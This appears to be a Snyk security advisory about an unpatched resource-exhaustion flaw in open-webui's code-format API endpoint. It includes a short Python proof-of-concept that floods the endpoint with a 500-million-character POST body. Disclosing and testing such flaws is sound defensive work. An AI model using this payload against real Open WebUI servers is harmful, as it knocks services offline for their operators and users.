Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsLearn about Allocation of Resources Without Limits or Throttling vulnerabilities in an interactive lesson.
Start learningThere is no fixed version for open-webui
.
open-webui is an Open WebUI
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the api/v1/utils/code/format
endpoint. An attacker can cause the server to become unresponsive or experience significant degradation by sending a POST request with an excessively high volume of content.
import requests
num = 500000000 # Must not cross 8 zero. with 9 zero it throws 400 Bad Request
# Construct the code with the specified number of characters
code_value = "5" * num
# Define the URL and headers
url = "http://localhost:8080/api/v1/utils/code/format"
# Define the payload
payload = {
"code": code_value
}
# Send the POST request
response = requests.post(url, json=payload)